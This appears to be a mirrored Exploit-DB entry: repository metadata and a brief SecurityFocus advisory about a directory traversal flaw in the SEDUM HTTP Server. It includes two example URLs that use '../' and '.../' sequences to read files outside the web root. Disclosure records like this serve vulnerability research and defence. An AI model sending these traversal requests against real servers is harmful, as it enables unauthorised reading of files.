exploit-db-mirror/exploits/windows/remote/20608.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

7 lines
No EOL
350 B
Text

source: https://www.securityfocus.com/bid/2335/info
A remote user could gain read access to known files outside of the root directory in a SEDUM HTTP Server. Requesting a specially crafted URL composed of '../' or '.../' sequences will disclose the requested file.
http://target/../[file outside web root]
http://target/.../[file outside web root]